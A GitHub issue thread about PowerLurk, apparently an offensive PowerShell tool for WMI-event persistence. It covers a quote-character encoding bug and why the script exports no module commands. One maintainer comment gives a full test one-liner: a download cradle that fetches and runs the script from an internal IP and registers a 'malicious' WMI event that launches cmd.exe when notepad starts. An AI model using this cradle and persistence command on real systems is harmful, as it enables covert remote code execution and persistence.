### ISSUE TITLE
Import issue

### ISSUE THREAD

**Issue by cynicXer** [Sw4mpf0x/PowerLurk#1]
Looks like an awesome project and I can't wait to play with it, but I'm running into a couple of issues.

Looks like the single ticks in front of Content argument on lines 164 and 1164 are grave quotes instead of single quotes.  Might be because I cloned it to a Linux host and opened in a Windows VM.  Windows doesn't recognize the character when I try to import the module.  Import works after I change the grave quotes to single quotes.

$CustomClass.Properties.Add(â€˜Content', $Payload)

However, after importing (used the command in Readme.md), it doesn't appear to be exporting any commands.

![image](https://cloud.githubusercontent.com/assets/18399878/16853436/eb09da00-49d1-11e6-85f8-60f1aa9789a2.png)

**Comment by Sw4mpf0x** [comment]
I ran into the same issue over the weekend! It didn't rear its head until testing with a download cradle. At some point, two grave quotes made their way into PowerLurk. I have fixed this and tested it out. It seems to be working now, let me know if this fixes your issue. Testing involved cloning the repo and hosting with Apache, then using the following command:
`powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://172.16.141.144/PowerLurk.ps1'); Register-MaliciousWmiEvent -PermanentCommand 'cmd.exe /c echo test >> c:\temp\log.txt' -EventName test -Trigger ProcessStart -ProcessName notepad.exe"`

**Comment by HarmJ0y** [comment]
As the project is currently a straight .ps1 PowerShell script, and isn't built as a 'proper' PowerShell module with a script module (.psm1) and module manifest (.psd1), no commands will be exported. However all functionality should work fine even though the functions aren't formally exported :)
